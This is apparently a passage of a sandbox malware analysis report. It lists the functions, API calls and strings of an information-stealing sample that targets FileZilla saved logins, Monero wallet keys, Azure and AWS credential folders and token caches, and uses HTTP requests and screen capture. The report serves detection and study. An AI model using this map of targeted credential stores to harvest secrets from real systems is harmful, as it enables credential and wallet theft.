                              • lstrcat.KERNEL32(?,00161698), ref: 00150626
                              • lstrcat.KERNEL32(?,0016169C), ref: 00150635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 0015068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 498dd3bde36d02f53c1d73c6cd18952fb50985319e56d55d1eee88306d418fa9
                              • Instruction ID: 3712f9f238b9dc0ebba846912ec3be0b53864dbf2eff27707becdea3c1245d9e
                              • Opcode Fuzzy Hash: 498dd3bde36d02f53c1d73c6cd18952fb50985319e56d55d1eee88306d418fa9
                              • Instruction Fuzzy Hash: 81D14171940208EBDB05EBF0DD96DEE777CBF28302F844559F512AA091EF74AA09CB61
                              Function 00145960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 001447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00144839
                                • Part of subcall function 001447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00144849
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001459F8
                              • StrCmpCA.SHLWAPI(?,00DDEAA0), ref: 00145A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00145B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00DDEA30,00000000,?,00DDA5C8,00000000,?,00161A1C), ref: 00145E71
                              • lstrlen.KERNEL32(00000000), ref: 00145E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00145E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00145E9A
                              • lstrlen.KERNEL32(00000000), ref: 00145EAF
                              • lstrlen.KERNEL32(00000000), ref: 00145ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00145EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00145F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00145F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00145F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00145FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00145FBD
                              • HttpOpenRequestA.WININET(00000000,00DDEB10,?,00DDE578,00000000,00000000,00400100,00000000), ref: 00145BF8
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                              • InternetCloseHandle.WININET(00000000), ref: 00145FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: a0b5bcd1c3dad78164911e636009e2f820689a1f4192b34b6016652d66672f9d
                              • Instruction ID: 9287a5929100f86b1ac5437ea7cf652a673ad16949f092c7cbdef7057da86142
                              • Opcode Fuzzy Hash: a0b5bcd1c3dad78164911e636009e2f820689a1f4192b34b6016652d66672f9d
                              • Instruction Fuzzy Hash: 44122171860118EBDB15EBA0DC95FEEB378BF24702F804299B51667091EF702A4DCF61
                              Function 0014CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 00158B60: GetSystemTime.KERNEL32(00160E1A,00DDA988,001605AE,?,?,001413F9,?,0000001A,00160E1A,00000000,?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 00158B86
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0014CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0014D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0014D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0014D208
                              • lstrcat.KERNEL32(?,00161478), ref: 0014D217
                              • lstrcat.KERNEL32(?,00000000), ref: 0014D22A
                              • lstrcat.KERNEL32(?,0016147C), ref: 0014D239
                              • lstrcat.KERNEL32(?,00000000), ref: 0014D24C
                              • lstrcat.KERNEL32(?,00161480), ref: 0014D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 0014D26E
                              • lstrcat.KERNEL32(?,00161484), ref: 0014D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 0014D290
                              • lstrcat.KERNEL32(?,00161488), ref: 0014D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 0014D2B2
                              • lstrcat.KERNEL32(?,0016148C), ref: 0014D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0014D2D4
                              • lstrcat.KERNEL32(?,00161490), ref: 0014D2E3
                                • Part of subcall function 0015A820: lstrlen.KERNEL32(00144F05,?,?,00144F05,00160DDE), ref: 0015A82B
                                • Part of subcall function 0015A820: lstrcpy.KERNEL32(00160DDE,00000000), ref: 0015A885
                              • lstrlen.KERNEL32(?), ref: 0014D32A
                              • lstrlen.KERNEL32(?), ref: 0014D339
                                • Part of subcall function 0015AA70: StrCmpCA.SHLWAPI(00DD9000,0014A7A7,?,0014A7A7,00DD9000), ref: 0015AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 0014D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 42588674ec5d0f7aaa3ebb5295b7992e2b1058df5b88a80951e0dc4eba409176
                              • Instruction ID: 59a80283139f9f9ca3a2494ff54698e2a74b7e11700ea870b55a17ba20df4440
                              • Opcode Fuzzy Hash: 42588674ec5d0f7aaa3ebb5295b7992e2b1058df5b88a80951e0dc4eba409176
                              • Instruction Fuzzy Hash: 03E17271940108EBDB05EBA0DD96EEE777CBF24302F904255F513AB091EF35AA09CB62
                              Function 0014C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00DDD568,00000000,?,0016144C,00000000,?,?), ref: 0014CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0014CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0014CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0014CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0014CAD9
                              • StrStrA.SHLWAPI(?,00DDD628,00160B52), ref: 0014CAF7
                              • StrStrA.SHLWAPI(00000000,00DDD580), ref: 0014CB1E
                              • StrStrA.SHLWAPI(?,00DDDAC8,00000000,?,00161458,00000000,?,00000000,00000000,?,00DD9030,00000000,?,00161454,00000000,?), ref: 0014CCA2
                              • StrStrA.SHLWAPI(00000000,00DDD888), ref: 0014CCB9
                                • Part of subcall function 0014C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0014C871
                                • Part of subcall function 0014C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0014C87C
                              • StrStrA.SHLWAPI(?,00DDD888,00000000,?,0016145C,00000000,?,00000000,00DD9070), ref: 0014CD5A
                              • StrStrA.SHLWAPI(00000000,00DD9180), ref: 0014CD71
                                • Part of subcall function 0014C820: lstrcat.KERNEL32(?,00160B46), ref: 0014C943
                                • Part of subcall function 0014C820: lstrcat.KERNEL32(?,00160B47), ref: 0014C957
                                • Part of subcall function 0014C820: lstrcat.KERNEL32(?,00160B4E), ref: 0014C978
                              • lstrlen.KERNEL32(00000000), ref: 0014CE44
                              • CloseHandle.KERNEL32(00000000), ref: 0014CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 701e931a3639f4646218c22da25954e285b6a17e81df0e36e01f9df08b3be2d2
                              • Instruction ID: 1f40d9bb189e3702a7766a5cd3e5a6197305a7214afe2d1a4e0c854b02f1194a
                              • Opcode Fuzzy Hash: 701e931a3639f4646218c22da25954e285b6a17e81df0e36e01f9df08b3be2d2
                              • Instruction Fuzzy Hash: 56E11071940108EBDB15EBA0DC95FEEB778BF24302F804259F5166B191EF706A4ECB62
                              Function 00158320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • RegOpenKeyExA.ADVAPI32(00000000,00DDB4F0,00000000,00020019,00000000,001605B6), ref: 001583A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00158426
                              • wsprintfA.USER32 ref: 00158459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0015847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0015848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00158499
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: d77bb2d9b6b38110f59ef07ede29aa41830e6c7496234c1bf2a5de70f60641e6
                              • Instruction ID: 57d5f7ccbddd791d2fad5c31c141971337a8159fe6fc2d2d30291351740de70d
                              • Opcode Fuzzy Hash: d77bb2d9b6b38110f59ef07ede29aa41830e6c7496234c1bf2a5de70f60641e6
                              • Instruction Fuzzy Hash: 3A814D71950218DBEB29DB50CC91FEA77BCBF18701F4082D9E519AA140DF716B89CFA1
                              Function 00154D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00158DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00158E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00154DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00154DCD
                                • Part of subcall function 00154910: wsprintfA.USER32 ref: 0015492C
                                • Part of subcall function 00154910: FindFirstFileA.KERNEL32(?,?), ref: 00154943
                              • lstrcat.KERNEL32(?,00000000), ref: 00154E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00154E59
                                • Part of subcall function 00154910: StrCmpCA.SHLWAPI(?,00160FDC), ref: 00154971
                                • Part of subcall function 00154910: StrCmpCA.SHLWAPI(?,00160FE0), ref: 00154987
                                • Part of subcall function 00154910: FindNextFileA.KERNEL32(000000FF,?), ref: 00154B7D
                                • Part of subcall function 00154910: FindClose.KERNEL32(000000FF), ref: 00154B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00154EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00154EE5
                                • Part of subcall function 00154910: wsprintfA.USER32 ref: 001549B0
                                • Part of subcall function 00154910: StrCmpCA.SHLWAPI(?,001608D2), ref: 001549C5
                                • Part of subcall function 00154910: wsprintfA.USER32 ref: 001549E2
                                • Part of subcall function 00154910: PathMatchSpecA.SHLWAPI(?,?), ref: 00154A1E
                                • Part of subcall function 00154910: lstrcat.KERNEL32(?,00DDEB00), ref: 00154A4A
                                • Part of subcall function 00154910: lstrcat.KERNEL32(?,00160FF8), ref: 00154A5C
                                • Part of subcall function 00154910: lstrcat.KERNEL32(?,?), ref: 00154A70
                                • Part of subcall function 00154910: lstrcat.KERNEL32(?,00160FFC), ref: 00154A82
                                • Part of subcall function 00154910: lstrcat.KERNEL32(?,?), ref: 00154A96
                                • Part of subcall function 00154910: CopyFileA.KERNEL32(?,?,00000001), ref: 00154AAC
                                • Part of subcall function 00154910: DeleteFileA.KERNEL32(?), ref: 00154B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: b51281107ed0c1b43c9d1cd76a506178d03e4dc57769874c8f57838ad5c09e53
                              • Instruction ID: 9361ef9b8e1d3d2692f0759c545fa4a51904f34d7e9fd00f0ac4157ed80e1366
                              • Opcode Fuzzy Hash: b51281107ed0c1b43c9d1cd76a506178d03e4dc57769874c8f57838ad5c09e53
                              • Instruction Fuzzy Hash: 4C4183B9940204B7DB10F770EC47FEA3638AB24705F404594B6456A0C1EFB45BDD8BA2
                              Function 00159010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0015906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 2e1a8b208fb22641f8c094d1b2d96a997cc2d375403635a9dede1f5ecd513acd
                              • Instruction ID: 8a3d30630fc555663f8256c2b707f8c440762adb99d0dbcbb9cf42bf1389d905
                              • Opcode Fuzzy Hash: 2e1a8b208fb22641f8c094d1b2d96a997cc2d375403635a9dede1f5ecd513acd
                              • Instruction Fuzzy Hash: 3171E971910608EBDB04DFE4DC89FEEBBBCAB48301F108549F616AB294DB34A945CB61
                              Function 00152E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001531C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0015335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001534EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
